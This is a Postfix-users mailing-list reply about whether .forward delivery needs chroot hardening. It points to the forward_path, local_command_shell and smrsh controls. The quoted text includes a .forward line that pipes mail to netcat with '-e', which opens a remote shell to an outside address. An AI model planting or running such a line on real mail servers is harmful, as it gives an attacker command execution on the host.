Tomasz Pala via Postfix-users:
> On 2024-12-20 19:02, Wietse Venema via Postfix-users wrote:
> > 
> >> You say "local is non-chrootable" - I say local is the mostly exposed,
> >> running user-provided content, binary and environment. It's the local
> >> which can exploit CVE in your kernel. You're not preventing any of this.
> > 
> > I think that statements like this are disqualifying their speaker from
> > this discussion.
> 
> target $ cat .forward
> "| nc 10.1.16.9 1919 -e ~target/.forward_shell2.py"

Postfix separates mechanism from policy.

Mechanism:

Postfix .forward impersonation aims to provide the same rights as
a user that has interactive shell access. If Postfix provides more
rights than interactive shell access, that is a security hole in
Postfix. If Postfix provides less, then Postfix is just broken.

Policy:

If a user has no interactive shell access, then their .froward
privileges can be taken away with forward_path, and they can be
reduced with local_command_shell.

https://www.postfix.org/postconf.5.html#forward_path with
https://www.postfix.org/postconf.5.html#local_command_shell
https://linux.die.net/man/8/smrsh

What are your contributions to the open-sorce ecosystem?

        Wietse
_______________________________________________
Postfix-users mailing list -- postfix-users@postfix.org
To unsubscribe send an email to postfix-users-le...@postfix.org

Reply via email to